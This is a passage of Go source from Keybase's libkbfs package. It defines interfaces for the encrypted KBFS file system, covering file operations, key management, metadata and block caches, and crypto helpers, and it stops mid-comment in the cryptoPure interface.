// Copyright 2016 Keybase Inc. All rights reserved. // Use of this source code is governed by a BSD // license that can be found in the LICENSE file. package libkbfs import ( "time" "github.com/keybase/client/go/libkb" "github.com/keybase/client/go/logger" "github.com/keybase/client/go/protocol/keybase1" "github.com/keybase/kbfs/kbfsblock" "github.com/keybase/kbfs/kbfscodec" "github.com/keybase/kbfs/kbfscrypto" "github.com/keybase/kbfs/kbfsmd" "github.com/keybase/kbfs/tlf" metrics "github.com/rcrowley/go-metrics" "golang.org/x/net/context" ) type dataVersioner interface { // DataVersion returns the data version for this block DataVersion() DataVer } type logMaker interface { MakeLogger(module string) logger.Logger } type blockCacher interface { BlockCache() BlockCache } type keyGetterGetter interface { keyGetter() blockKeyGetter } type codecGetter interface { Codec() kbfscodec.Codec } type blockServerGetter interface { BlockServer() BlockServer } type cryptoPureGetter interface { cryptoPure() cryptoPure } type cryptoGetter interface { Crypto() Crypto } type currentSessionGetterGetter interface { CurrentSessionGetter() CurrentSessionGetter } type signerGetter interface { Signer() kbfscrypto.Signer } type diskBlockCacheGetter interface { DiskBlockCache() DiskBlockCache } type diskBlockCacheSetter interface { SetDiskBlockCache(DiskBlockCache) } type clockGetter interface { Clock() Clock } type diskLimiterGetter interface { DiskLimiter() DiskLimiter } // Block just needs to be (de)serialized using msgpack type Block interface { dataVersioner // GetEncodedSize returns the encoded size of this block, but only // if it has been previously set; otherwise it returns 0. GetEncodedSize() uint32 // SetEncodedSize sets the encoded size of this block, locally // caching it. The encoded size is not serialized. SetEncodedSize(size uint32) // NewEmpty returns a new block of the same type as this block NewEmpty() Block // Set sets this block to the same value as the passed-in block Set(other Block) // ToCommonBlock retrieves this block as a *CommonBlock. ToCommonBlock() *CommonBlock } // NodeID is a unique but transient ID for a Node. That is, two Node // objects in memory at the same time represent the same file or // directory if and only if their NodeIDs are equal (by pointer). type NodeID interface { // ParentID returns the NodeID of the directory containing the // pointed-to file or directory, or nil if none exists. ParentID() NodeID } // Node represents a direct pointer to a file or directory in KBFS. // It is somewhat like an inode in a regular file system. Users of // KBFS can use Node as a handle when accessing files or directories // they have previously looked up. type Node interface { // GetID returns the ID of this Node. This should be used as a // map key instead of the Node itself. GetID() NodeID // GetFolderBranch returns the folder ID and branch for this Node. GetFolderBranch() FolderBranch // GetBasename returns the current basename of the node, or "" // if the node has been unlinked. GetBasename() string } // KBFSOps handles all file system operations. Expands all indirect // pointers. Operations that modify the server data change all the // block IDs along the path, and so must return a path with the new // BlockIds so the caller can update their references. // // KBFSOps implementations must guarantee goroutine-safety of calls on // a per-top-level-folder basis. 
// // There are two types of operations that could block: // * remote-sync operations, that need to synchronously update the // MD for the corresponding top-level folder. When these // operations return successfully, they will have guaranteed to // have successfully written the modification to the KBFS servers. // * remote-access operations, that don't sync any modifications to KBFS // servers, but may block on reading data from the servers. // // KBFSOps implementations are supposed to give git-like consistency // semantics for modification operations; they will be visible to // other clients immediately after the remote-sync operations succeed, // if and only if there was no other intervening modification to the // same folder. If not, the change will be sync'd to the server in a // special per-device "unmerged" area before the operation succeeds. // In this case, the modification will not be visible to other clients // until the KBFS code on this device performs automatic conflict // resolution in the background. // // All methods take a Context (see https://blog.golang.org/context), // and if that context is cancelled during the operation, KBFSOps will // abort any blocking calls and return ctx.Err(). Any notifications // resulting from an operation will also include this ctx (or a // Context derived from it), allowing the caller to determine whether // the notification is a result of their own action or an external // action. type KBFSOps interface { // GetFavorites returns the logged-in user's list of favorite // top-level folders. This is a remote-access operation. GetFavorites(ctx context.Context) ([]Favorite, error) // RefreshCachedFavorites tells the instances to forget any cached // favorites list and fetch a new list from the server. The // effects are asychronous; if there's an error refreshing the // favorites, the cached favorites will become empty. RefreshCachedFavorites(ctx context.Context) // AddFavorite adds the favorite to both the server and // the local cache. AddFavorite(ctx context.Context, fav Favorite) error // DeleteFavorite deletes the favorite from both the server and // the local cache. Idempotent, so it succeeds even if the folder // isn't favorited. DeleteFavorite(ctx context.Context, fav Favorite) error // GetTLFCryptKeys gets crypt key of all generations as well as // TLF ID for tlfHandle. The returned keys (the keys slice) are ordered by // generation, starting with the key for FirstValidKeyGen. GetTLFCryptKeys(ctx context.Context, tlfHandle *TlfHandle) ( keys []kbfscrypto.TLFCryptKey, id tlf.ID, err error) // GetTLFID gets the TLF ID for tlfHandle. GetTLFID(ctx context.Context, tlfHandle *TlfHandle) (tlf.ID, error) // GetOrCreateRootNode returns the root node and root entry // info associated with the given TLF handle and branch, if // the logged-in user has read permissions to the top-level // folder. It creates the folder if one doesn't exist yet (and // branch == MasterBranch), and the logged-in user has write // permissions to the top-level folder. This is a // remote-access operation. GetOrCreateRootNode( ctx context.Context, h *TlfHandle, branch BranchName) ( node Node, ei EntryInfo, err error) // GetRootNode is like GetOrCreateRootNode but if the root node // does not exist it will return a nil Node and not create it. 
GetRootNode( ctx context.Context, h *TlfHandle, branch BranchName) ( node Node, ei EntryInfo, err error) // GetDirChildren returns a map of children in the directory, // mapped to their EntryInfo, if the logged-in user has read // permission for the top-level folder. This is a remote-access // operation. GetDirChildren(ctx context.Context, dir Node) (map[string]EntryInfo, error) // Lookup returns the Node and entry info associated with a // given name in a directory, if the logged-in user has read // permissions to the top-level folder. The returned Node is nil // if the name is a symlink. This is a remote-access operation. Lookup(ctx context.Context, dir Node, name string) (Node, EntryInfo, error) // Stat returns the entry info associated with a // given Node, if the logged-in user has read permissions to the // top-level folder. This is a remote-access operation. Stat(ctx context.Context, node Node) (EntryInfo, error) // CreateDir creates a new subdirectory under the given node, if // the logged-in user has write permission to the top-level // folder. Returns the new Node for the created subdirectory, and // its new entry info. This is a remote-sync operation. CreateDir(ctx context.Context, dir Node, name string) ( Node, EntryInfo, error) // CreateFile creates a new file under the given node, if the // logged-in user has write permission to the top-level folder. // Returns the new Node for the created file, and its new // entry info. excl (when implemented) specifies whether this is an exclusive // create. Semantically setting excl to WithExcl is like O_CREAT|O_EXCL in a // Unix open() call. // // This is a remote-sync operation. CreateFile(ctx context.Context, dir Node, name string, isExec bool, excl Excl) ( Node, EntryInfo, error) // CreateLink creates a new symlink under the given node, if the // logged-in user has write permission to the top-level folder. // Returns the new entry info for the created symlink. This // is a remote-sync operation. CreateLink(ctx context.Context, dir Node, fromName string, toPath string) ( EntryInfo, error) // RemoveDir removes the subdirectory represented by the given // node, if the logged-in user has write permission to the // top-level folder. Will return an error if the subdirectory is // not empty. This is a remote-sync operation. RemoveDir(ctx context.Context, dir Node, dirName string) error // RemoveEntry removes the directory entry represented by the // given node, if the logged-in user has write permission to the // top-level folder. This is a remote-sync operation. RemoveEntry(ctx context.Context, dir Node, name string) error // Rename performs an atomic rename operation with a given // top-level folder if the logged-in user has write permission to // that folder, and will return an error if nodes from different // folders are passed in. Also returns an error if the new name // already has an entry corresponding to an existing directory // (only non-dir types may be renamed over). This is a // remote-sync operation. Rename(ctx context.Context, oldParent Node, oldName string, newParent Node, newName string) error // Read fills in the given buffer with data from the file at the // given node starting at the given offset, if the logged-in user // has read permission to the top-level folder. The read data // reflects any outstanding writes and truncates to that file that // have been written through this KBFSOps object, even if those // writes have not yet been sync'd. 
There is no guarantee that // Read returns all of the requested data; it will return the // number of bytes that it wrote to the dest buffer. Reads on an // unlinked file may or may not succeed, depending on whether or // not the data has been cached locally. If (0, nil) is returned, // that means EOF has been reached. This is a remote-access // operation. Read(ctx context.Context, file Node, dest []byte, off int64) (int64, error) // Write modifies the file at the given node, by writing the given // buffer at the given offset within the file, if the logged-in // user has write permission to the top-level folder. It // overwrites any data already there, and extends the file size as // necessary to accomodate the new data. It guarantees to write // the entire buffer in one operation. Writes on an unlinked file // may or may not succeed as no-ops, depending on whether or not // the necessary blocks have been locally cached. This is a // remote-access operation. Write(ctx context.Context, file Node, data []byte, off int64) error // Truncate modifies the file at the given node, by either // shrinking or extending its size to match the given size, if the // logged-in user has write permission to the top-level folder. // If extending the file, it pads the new data with 0s. Truncates // on an unlinked file may or may not succeed as no-ops, depending // on whether or not the necessary blocks have been locally // cached. This is a remote-access operation. Truncate(ctx context.Context, file Node, size uint64) error // SetEx turns on or off the executable bit on the file // represented by a given node, if the logged-in user has write // permissions to the top-level folder. This is a remote-sync // operation. SetEx(ctx context.Context, file Node, ex bool) error // SetMtime sets the modification time on the file represented by // a given node, if the logged-in user has write permissions to // the top-level folder. If mtime is nil, it is a noop. This is // a remote-sync operation. SetMtime(ctx context.Context, file Node, mtime *time.Time) error // SyncAll flushes all outstanding writes and truncates for any // dirty files to the KBFS servers within the given folder, if the // logged-in user has write permissions to the top-level folder. // If done through a file system interface, this may include // modifications done via multiple file handles. This is a // remote-sync operation. SyncAll(ctx context.Context, folderBranch FolderBranch) error // FolderStatus returns the status of a particular folder/branch, along // with a channel that will be closed when the status has been // updated (to eliminate the need for polling this method). FolderStatus(ctx context.Context, folderBranch FolderBranch) ( FolderBranchStatus, <-chan StatusUpdate, error) // Status returns the status of KBFS, along with a channel that will be // closed when the status has been updated (to eliminate the need for // polling this method). Note that this channel only applies to // connection status changes. // // KBFSStatus can be non-empty even if there is an error. Status(ctx context.Context) ( KBFSStatus, <-chan StatusUpdate, error) // UnstageForTesting clears out this device's staged state, if // any, and fast-forwards to the current head of this // folder-branch. UnstageForTesting(ctx context.Context, folderBranch FolderBranch) error // RequestRekey requests to rekey this folder. Note that this asynchronously // requests a rekey, so canceling ctx doesn't cancel the rekey. 
RequestRekey(ctx context.Context, id tlf.ID) // SyncFromServerForTesting blocks until the local client has // contacted the server and guaranteed that all known updates // for the given top-level folder have been applied locally // (and notifications sent out to any observers). It returns // an error if this folder-branch is currently unmerged or // dirty locally. SyncFromServerForTesting(ctx context.Context, folderBranch FolderBranch) error // GetUpdateHistory returns a complete history of all the merged // updates of the given folder, in a data structure that's // suitable for encoding directly into JSON. This is an expensive // operation, and should only be used for ocassional debugging. // Note that the history does not include any unmerged changes or // outstanding writes from the local device. GetUpdateHistory(ctx context.Context, folderBranch FolderBranch) ( history TLFUpdateHistory, err error) // GetEditHistory returns a clustered list of the most recent file // edits by each of the valid writers of the given folder. users // looking to get updates to this list can register as an observer // for the folder. GetEditHistory(ctx context.Context, folderBranch FolderBranch) ( edits TlfWriterEdits, err error) // GetNodeMetadata gets metadata associated with a Node. GetNodeMetadata(ctx context.Context, node Node) (NodeMetadata, error) // Shutdown is called to clean up any resources associated with // this KBFSOps instance. Shutdown(ctx context.Context) error // PushConnectionStatusChange updates the status of a service for // human readable connection status tracking. PushConnectionStatusChange(service string, newStatus error) // PushStatusChange causes Status listeners to be notified via closing // the status channel. PushStatusChange() // ClearPrivateFolderMD clears any cached private folder metadata, // e.g. on a logout. ClearPrivateFolderMD(ctx context.Context) // ForceFastForward forwards the nodes of all folders that have // been previously cleared with `ClearPrivateFolderMD` to their // newest version. It works asynchronously, so no error is // returned. ForceFastForward(ctx context.Context) // TeamNameChanged indicates that a team has changed its name, and // we should clean up any outstanding handle info associated with // the team ID. TeamNameChanged(ctx context.Context, tid keybase1.TeamID) } type merkleSeqNoGetter interface { // GetCurrentMerkleSeqNo returns the current sequence number of the // global Keybase Merkle tree. GetCurrentMerkleSeqNo(ctx context.Context) (MerkleSeqNo, error) } // KeybaseService is an interface for communicating with the keybase // service. type KeybaseService interface { merkleSeqNoGetter // Resolve, given an assertion, resolves it to a username/UID // pair. The username <-> UID mapping is trusted and // immutable, so it can be cached. If the assertion is just // the username or a UID assertion, then the resolution can // also be trusted. If the returned pair is equal to that of // the current session, then it can also be // trusted. Otherwise, Identify() needs to be called on the // assertion before the assertion -> (username, UID) mapping // can be trusted. Resolve(ctx context.Context, assertion string) ( libkb.NormalizedUsername, keybase1.UserOrTeamID, error) // Identify, given an assertion, returns a UserInfo struct // with the user that matches that assertion, or an error // otherwise. The reason string is displayed on any tracker // popups spawned. 
Identify(ctx context.Context, assertion, reason string) ( libkb.NormalizedUsername, keybase1.UserOrTeamID, error) // LoadUserPlusKeys returns a UserInfo struct for a // user with the specified UID. // If you have the UID for a user and don't require Identify to // validate an assertion or the identity of a user, use this to // get UserInfo structs as it is much cheaper than Identify. // // pollForKID, if non empty, causes `PollForKID` field to be populated, which // causes the service to poll for the given KID. This is useful during // provisioning where the provisioner needs to get the MD revision that the // provisionee has set the rekey bit on. LoadUserPlusKeys(ctx context.Context, uid keybase1.UID, pollForKID keybase1.KID) (UserInfo, error) // LoadUnverifiedKeys returns a list of unverified public keys. They are the union // of all known public keys associated with the account and the currently verified // keys currently part of the user's sigchain. LoadUnverifiedKeys(ctx context.Context, uid keybase1.UID) ( []keybase1.PublicKey, error) // LoadTeamPlusKeys returns a TeamInfo struct for a team with the // specified TeamID. LoadTeamPlusKeys(ctx context.Context, tid keybase1.TeamID) (TeamInfo, error) // CurrentSession returns a SessionInfo struct with all the // information for the current session, or an error otherwise. CurrentSession(ctx context.Context, sessionID int) (SessionInfo, error) // FavoriteAdd adds the given folder to the list of favorites. FavoriteAdd(ctx context.Context, folder keybase1.Folder) error // FavoriteAdd removes the given folder from the list of // favorites. FavoriteDelete(ctx context.Context, folder keybase1.Folder) error // FavoriteList returns the current list of favorites. FavoriteList(ctx context.Context, sessionID int) ([]keybase1.Folder, error) // Notify sends a filesystem notification. Notify(ctx context.Context, notification *keybase1.FSNotification) error // NotifySyncStatus sends a sync status notification. NotifySyncStatus(ctx context.Context, status *keybase1.FSPathSyncStatus) error // FlushUserFromLocalCache instructs this layer to clear any // KBFS-side, locally-cached information about the given user. // This does NOT involve communication with the daemon, this is // just to force future calls loading this user to fall through to // the daemon itself, rather than being served from the cache. FlushUserFromLocalCache(ctx context.Context, uid keybase1.UID) // FlushUserUnverifiedKeysFromLocalCache instructs this layer to clear any // KBFS-side, locally-cached unverified keys for the given user. FlushUserUnverifiedKeysFromLocalCache(ctx context.Context, uid keybase1.UID) // TODO: Add CryptoClient methods, too. // EstablishMountDir asks the service for the current mount path // and sets it if not established. EstablishMountDir(ctx context.Context) (string, error) // Shutdown frees any resources associated with this // instance. No other methods may be called after this is // called. Shutdown() } // KeybaseServiceCn defines methods needed to construct KeybaseService // and Crypto implementations. type KeybaseServiceCn interface { NewKeybaseService(config Config, params InitParams, ctx Context, log logger.Logger) (KeybaseService, error) NewCrypto(config Config, params InitParams, ctx Context, log logger.Logger) (Crypto, error) } type resolver interface { // Resolve, given an assertion, resolves it to a username/UID // pair. The username <-> UID mapping is trusted and // immutable, so it can be cached. 
If the assertion is just // the username or a UID assertion, then the resolution can // also be trusted. If the returned pair is equal to that of // the current session, then it can also be // trusted. Otherwise, Identify() needs to be called on the // assertion before the assertion -> (username, UserOrTeamID) mapping // can be trusted. // // TODO: some of the above assumptions on cacheability aren't // right for subteams, which can change their name, so this may // need updating. Resolve(ctx context.Context, assertion string) ( libkb.NormalizedUsername, keybase1.UserOrTeamID, error) } type identifier interface { // Identify resolves an assertion (which could also be a // username) to a UserInfo struct, spawning tracker popups if // necessary. The reason string is displayed on any tracker // popups spawned. Identify(ctx context.Context, assertion, reason string) ( libkb.NormalizedUsername, keybase1.UserOrTeamID, error) } type normalizedUsernameGetter interface { // GetNormalizedUsername returns the normalized username // corresponding to the given UID. GetNormalizedUsername(ctx context.Context, id keybase1.UserOrTeamID) ( libkb.NormalizedUsername, error) } // CurrentSessionGetter is an interface for objects that can return // session info. type CurrentSessionGetter interface { // GetCurrentSession gets the current session info. GetCurrentSession(ctx context.Context) (SessionInfo, error) } // TeamMembershipChecker is an interface for objects that can check // the writer/reader membership of teams. type TeamMembershipChecker interface { // IsTeamWriter checks whether the given user is a writer of the // given team right now. IsTeamWriter(ctx context.Context, tid keybase1.TeamID, uid keybase1.UID) ( bool, error) // IsTeamReader checks whether the given user is a reader of the // given team right now. IsTeamReader(ctx context.Context, tid keybase1.TeamID, uid keybase1.UID) ( bool, error) // TODO: add Was* method for figuring out whether the user was a // writer/reader at a particular Merkle sequence number. Not sure // whether these calls should also verify that sequence number // corresponds to a given TLF revision, or leave that work to // another component. } type teamKeysGetter interface { // GetTeamTLFCryptKeys gets all of a team's secret crypt keys, by // generation, as well as the latest key generation number for the // team. GetTeamTLFCryptKeys(ctx context.Context, tid keybase1.TeamID) ( map[KeyGen]kbfscrypto.TLFCryptKey, KeyGen, error) } // KBPKI interacts with the Keybase daemon to fetch user info. type KBPKI interface { CurrentSessionGetter resolver identifier normalizedUsernameGetter merkleSeqNoGetter TeamMembershipChecker teamKeysGetter // HasVerifyingKey returns nil if the given user has the given // VerifyingKey, and an error otherwise. HasVerifyingKey(ctx context.Context, uid keybase1.UID, verifyingKey kbfscrypto.VerifyingKey, atServerTime time.Time) error // HasUnverifiedVerifyingKey returns nil if the given user has the given // unverified VerifyingKey, and an error otherwise. Note that any match // is with a key not verified to be currently connected to the user via // their sigchain. This is currently only used to verify finalized or // reset TLFs. Further note that unverified keys is a super set of // verified keys. HasUnverifiedVerifyingKey(ctx context.Context, uid keybase1.UID, verifyingKey kbfscrypto.VerifyingKey) error // GetCryptPublicKeys gets all of a user's crypt public keys (including // paper keys). 
GetCryptPublicKeys(ctx context.Context, uid keybase1.UID) ( []kbfscrypto.CryptPublicKey, error) // TODO: Split the methods below off into a separate // FavoriteOps interface. // FavoriteAdd adds folder to the list of the logged in user's // favorite folders. It is idempotent. FavoriteAdd(ctx context.Context, folder keybase1.Folder) error // FavoriteDelete deletes folder from the list of the logged in user's // favorite folders. It is idempotent. FavoriteDelete(ctx context.Context, folder keybase1.Folder) error // FavoriteList returns the list of all favorite folders for // the logged in user. FavoriteList(ctx context.Context) ([]keybase1.Folder, error) // Notify sends a filesystem notification. Notify(ctx context.Context, notification *keybase1.FSNotification) error } // KeyMetadata is an interface for something that holds key // information. This is usually implemented by RootMetadata. type KeyMetadata interface { // TlfID returns the ID of the TLF for which this object holds // key info. TlfID() tlf.ID // LatestKeyGeneration returns the most recent key generation // with key data in this object, or PublicKeyGen if this TLF // is public. LatestKeyGeneration() KeyGen // GetTlfHandle returns the handle for the TLF. It must not // return nil. // // TODO: Remove the need for this function in this interface, // so that BareRootMetadata can implement this interface // fully. GetTlfHandle() *TlfHandle // IsWriter checks that the given user is a valid writer of the TLF // right now. IsWriter( ctx context.Context, checker TeamMembershipChecker, uid keybase1.UID) ( bool, error) // HasKeyForUser returns whether or not the given user has // keys for at least one device. Returns an error if the TLF // is public. HasKeyForUser(user keybase1.UID) (bool, error) // GetTLFCryptKeyParams returns all the necessary info to // construct the TLF crypt key for the given key generation, // user, and device (identified by its crypt public key), or // false if not found. This returns an error if the TLF is // public. GetTLFCryptKeyParams( keyGen KeyGen, user keybase1.UID, key kbfscrypto.CryptPublicKey) ( kbfscrypto.TLFEphemeralPublicKey, EncryptedTLFCryptKeyClientHalf, TLFCryptKeyServerHalfID, bool, error) // StoresHistoricTLFCryptKeys returns whether or not history keys are // symmetrically encrypted; if not, they're encrypted per-device. StoresHistoricTLFCryptKeys() bool // GetHistoricTLFCryptKey attempts to symmetrically decrypt the key at the given // generation using the current generation's TLFCryptKey. GetHistoricTLFCryptKey(c cryptoPure, keyGen KeyGen, currentKey kbfscrypto.TLFCryptKey) ( kbfscrypto.TLFCryptKey, error) } type encryptionKeyGetter interface { // GetTLFCryptKeyForEncryption gets the crypt key to use for // encryption (i.e., with the latest key generation) for the // TLF with the given metadata. GetTLFCryptKeyForEncryption(ctx context.Context, kmd KeyMetadata) ( kbfscrypto.TLFCryptKey, error) } type mdDecryptionKeyGetter interface { // GetTLFCryptKeyForMDDecryption gets the crypt key to use for the // TLF with the given metadata to decrypt the private portion of // the metadata. It finds the appropriate key from mdWithKeys // (which in most cases is the same as mdToDecrypt) if it's not // already cached. 
GetTLFCryptKeyForMDDecryption(ctx context.Context, kmdToDecrypt, kmdWithKeys KeyMetadata) ( kbfscrypto.TLFCryptKey, error) } type blockDecryptionKeyGetter interface { // GetTLFCryptKeyForBlockDecryption gets the crypt key to use // for the TLF with the given metadata to decrypt the block // pointed to by the given pointer. GetTLFCryptKeyForBlockDecryption(ctx context.Context, kmd KeyMetadata, blockPtr BlockPointer) (kbfscrypto.TLFCryptKey, error) } type blockKeyGetter interface { encryptionKeyGetter blockDecryptionKeyGetter } // KeyManager fetches and constructs the keys needed for KBFS file // operations. type KeyManager interface { blockKeyGetter mdDecryptionKeyGetter // GetTLFCryptKeyOfAllGenerations gets the crypt keys of all generations // for current devices. keys contains crypt keys from all generations, in // order, starting from FirstValidKeyGen. GetTLFCryptKeyOfAllGenerations(ctx context.Context, kmd KeyMetadata) ( keys []kbfscrypto.TLFCryptKey, err error) // Rekey checks the given MD object, if it is a private TLF, // against the current set of device keys for all valid // readers and writers. If there are any new devices, it // updates all existing key generations to include the new // devices. If there are devices that have been removed, it // creates a new epoch of keys for the TLF. If there was an // error, or the RootMetadata wasn't changed, it returns false. // Otherwise, it returns true. If a new key generation is // added the second return value points to this new key. This // is to allow for caching of the TLF crypt key only after a // successful merged write of the metadata. Otherwise we could // prematurely pollute the key cache. // // If the given MD object is a public TLF, it simply updates // the TLF's handle with any newly-resolved writers. // // If promptPaper is set, prompts for any unlocked paper keys. // promptPaper shouldn't be set if md is for a public TLF. Rekey(ctx context.Context, md *RootMetadata, promptPaper bool) ( bool, *kbfscrypto.TLFCryptKey, error) } // Reporter exports events (asynchronously) to any number of sinks type Reporter interface { // ReportErr records that a given error happened. ReportErr(ctx context.Context, tlfName CanonicalTlfName, t tlf.Type, mode ErrorModeType, err error) // AllKnownErrors returns all errors known to this Reporter. AllKnownErrors() []ReportedError // Notify sends the given notification to any sink. Notify(ctx context.Context, notification *keybase1.FSNotification) // NotifySyncStatus sends the given path sync status to any sink. NotifySyncStatus(ctx context.Context, status *keybase1.FSPathSyncStatus) // Shutdown frees any resources allocated by a Reporter. Shutdown() } // MDCache gets and puts plaintext top-level metadata into the cache. type MDCache interface { // Get gets the metadata object associated with the given TLF ID, // revision number, and branch ID (NullBranchID for merged MD). Get(tlf tlf.ID, rev kbfsmd.Revision, bid BranchID) (ImmutableRootMetadata, error) // Put stores the metadata object. Put(md ImmutableRootMetadata) error // Delete removes the given metadata object from the cache if it exists. Delete(tlf tlf.ID, rev kbfsmd.Revision, bid BranchID) // Replace replaces the entry matching the md under the old branch // ID with the new one. If the old entry doesn't exist, this is // equivalent to a Put. Replace(newRmd ImmutableRootMetadata, oldBID BranchID) error } // KeyCache handles caching for both TLFCryptKeys and BlockCryptKeys. 
type KeyCache interface { // GetTLFCryptKey gets the crypt key for the given TLF. GetTLFCryptKey(tlf.ID, KeyGen) (kbfscrypto.TLFCryptKey, error) // PutTLFCryptKey stores the crypt key for the given TLF. PutTLFCryptKey(tlf.ID, KeyGen, kbfscrypto.TLFCryptKey) error } // BlockCacheLifetime denotes the lifetime of an entry in BlockCache. type BlockCacheLifetime int const ( // NoCacheEntry means that the entry will not be cached. NoCacheEntry BlockCacheLifetime = iota // TransientEntry means that the cache entry may be evicted at // any time. TransientEntry // PermanentEntry means that the cache entry must remain until // explicitly removed from the cache. PermanentEntry ) // BlockCacheSimple gets and puts plaintext dir blocks and file blocks into // a cache. These blocks are immutable and identified by their // content hash. type BlockCacheSimple interface { // Get gets the block associated with the given block ID. Get(ptr BlockPointer) (Block, error) // Put stores the final (content-addressable) block associated // with the given block ID. If lifetime is TransientEntry, // then it is assumed that the block exists on the server and // the entry may be evicted from the cache at any time. If // lifetime is PermanentEntry, then it is assumed that the // block doesn't exist on the server and must remain in the // cache until explicitly removed. As an intermediary state, // as when a block is being sent to the server, the block may // be put into the cache both with TransientEntry and // PermanentEntry -- these are two separate entries. This is // fine, since the block should be the same. Put(ptr BlockPointer, tlf tlf.ID, block Block, lifetime BlockCacheLifetime) error } // BlockCache specifies the interface of BlockCacheSimple, and also more // advanced and internal methods. type BlockCache interface { BlockCacheSimple // CheckForKnownPtr sees whether this cache has a transient // entry for the given file block, which must be a direct file // block containing data). Returns the full BlockPointer // associated with that ID, including key and data versions. // If no ID is known, return an uninitialized BlockPointer and // a nil error. CheckForKnownPtr(tlf tlf.ID, block *FileBlock) (BlockPointer, error) // DeleteTransient removes the transient entry for the given // pointer from the cache, as well as any cached IDs so the block // won't be reused. DeleteTransient(ptr BlockPointer, tlf tlf.ID) error // Delete removes the permanent entry for the non-dirty block // associated with the given block ID from the cache. No // error is returned if no block exists for the given ID. DeletePermanent(id kbfsblock.ID) error // DeleteKnownPtr removes the cached ID for the given file // block. It does not remove the block itself. DeleteKnownPtr(tlf tlf.ID, block *FileBlock) error // GetWithPrefetch retrieves a block from the cache, along with whether or // not it has triggered a prefetch. GetWithPrefetch(ptr BlockPointer) ( block Block, hasPrefetched bool, lifetime BlockCacheLifetime, err error) // PutWithPrefetch puts a block into the cache, along with whether or not // it has triggered a prefetch. PutWithPrefetch(ptr BlockPointer, tlf tlf.ID, block Block, lifetime BlockCacheLifetime, hasPrefetched bool) error // SetCleanBytesCapacity atomically sets clean bytes capacity for block // cache. SetCleanBytesCapacity(capacity uint64) // GetCleanBytesCapacity atomically gets clean bytes capacity for block // cache. 
GetCleanBytesCapacity() (capacity uint64) } // DirtyPermChan is a channel that gets closed when the holder has // permission to write. We are forced to define it as a type due to a // bug in mockgen that can't handle return values with a chan // struct{}. type DirtyPermChan <-chan struct{} // DirtyBlockCache gets and puts plaintext dir blocks and file blocks // into a cache, which have been modified by the application and not // yet committed on the KBFS servers. They are identified by a // (potentially random) ID that may not have any relationship with // their context, along with a Branch in case the same TLF is being // modified via multiple branches. Dirty blocks are never evicted, // they must be deleted explicitly. type DirtyBlockCache interface { // Get gets the block associated with the given block ID. Returns // the dirty block for the given ID, if one exists. Get(tlfID tlf.ID, ptr BlockPointer, branch BranchName) (Block, error) // Put stores a dirty block currently identified by the // given block pointer and branch name. Put(tlfID tlf.ID, ptr BlockPointer, branch BranchName, block Block) error // Delete removes the dirty block associated with the given block // pointer and branch from the cache. No error is returned if no // block exists for the given ID. Delete(tlfID tlf.ID, ptr BlockPointer, branch BranchName) error // IsDirty states whether or not the block associated with the // given block pointer and branch name is dirty in this cache. IsDirty(tlfID tlf.ID, ptr BlockPointer, branch BranchName) bool // IsAnyDirty returns whether there are any dirty blocks in the // cache. tlfID may be ignored. IsAnyDirty(tlfID tlf.ID) bool // RequestPermissionToDirty is called whenever a user wants to // write data to a file. The caller provides an estimated number // of bytes that will become dirty -- this is difficult to know // exactly without pre-fetching all the blocks involved, but in // practice we can just use the number of bytes sent in via the // Write. It returns a channel that blocks until the cache is // ready to receive more dirty data, at which point the channel is // closed. The user must call // `UpdateUnsyncedBytes(-estimatedDirtyBytes)` once it has // completed its write and called `UpdateUnsyncedBytes` for all // the exact dirty block sizes. RequestPermissionToDirty(ctx context.Context, tlfID tlf.ID, estimatedDirtyBytes int64) (DirtyPermChan, error) // UpdateUnsyncedBytes is called by a user, who has already been // granted permission to write, with the delta in block sizes that // were dirtied as part of the write. So for example, if a // newly-dirtied block of 20 bytes was extended by 5 bytes, they // should send 25. If on the next write (before any syncs), bytes // 10-15 of that same block were overwritten, they should send 0 // over the channel because there were no new bytes. If an // already-dirtied block is truncated, or if previously requested // bytes have now been updated more accurately in previous // requests, newUnsyncedBytes may be negative. wasSyncing should // be true if `BlockSyncStarted` has already been called for this // block. UpdateUnsyncedBytes(tlfID tlf.ID, newUnsyncedBytes int64, wasSyncing bool) // UpdateSyncingBytes is called when a particular block has // started syncing, or with a negative number when a block is no // longer syncing due to an error (and BlockSyncFinished will // never be called). 
UpdateSyncingBytes(tlfID tlf.ID, size int64) // BlockSyncFinished is called when a particular block has // finished syncing, though the overall sync might not yet be // complete. This lets the cache know it might be able to grant // more permission to writers. BlockSyncFinished(tlfID tlf.ID, size int64) // SyncFinished is called when a complete sync has completed and // its dirty blocks have been removed from the cache. This lets // the cache know it might be able to grant more permission to // writers. SyncFinished(tlfID tlf.ID, size int64) // ShouldForceSync returns true if the sync buffer is full enough // to force all callers to sync their data immediately. ShouldForceSync(tlfID tlf.ID) bool // Shutdown frees any resources associated with this instance. It // returns an error if there are any unsynced blocks. Shutdown() error } // DiskBlockCache caches blocks to the disk. type DiskBlockCache interface { // Get gets a block from the disk cache. Get(ctx context.Context, tlfID tlf.ID, blockID kbfsblock.ID) ( buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf, hasPrefetched bool, err error) // Put puts a block to the disk cache. Put(ctx context.Context, tlfID tlf.ID, blockID kbfsblock.ID, buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf) error // Delete deletes some blocks from the disk cache. Delete(ctx context.Context, blockIDs []kbfsblock.ID) (numRemoved int, sizeRemoved int64, err error) // UpdateMetadata updates the LRU time to Now() for a given block. UpdateMetadata(ctx context.Context, blockID kbfsblock.ID, hasPrefetched bool) error // Size returns the size in bytes of the disk cache. Size() int64 // Status returns the current status of the disk cache. Status() *DiskBlockCacheStatus // Shutdown cleanly shuts down the disk block cache. Shutdown(ctx context.Context) } // cryptoPure contains all methods of Crypto that don't depend on // implicit state, i.e. they're pure functions of the input. type cryptoPure interface { // MakeRandomTlfID generates a dir ID using a CSPRNG. MakeRandomTlfID(t tlf.Type) (tlf.ID, error) // MakeRandomBranchID generates a per-device branch ID using a // CSPRNG. It will not return LocalSquashBranchID or // NullBranchID. MakeRandomBranchID() (BranchID, error) // MakeMerkleHash computes the hash of a RootMetadataSigned object // for inclusion into the KBFS Merkle tree. MakeMerkleHash(md *RootMetadataSigned) (MerkleHash, error) // MakeTemporaryBlockID generates a temporary block ID using a // CSPRNG. This is used for indirect blocks before they're // committed to the server. MakeTemporaryBlockID() (kbfsblock.ID, error) // MakeRefNonce generates a block reference nonce using a // CSPRNG. This is used for distinguishing different references to // the same BlockID. MakeBlockRefNonce() (kbfsblock.RefNonce, error) // MakeRandomTLFEphemeralKeys generates ephemeral keys using a // CSPRNG for a TLF. These keys can then be used to 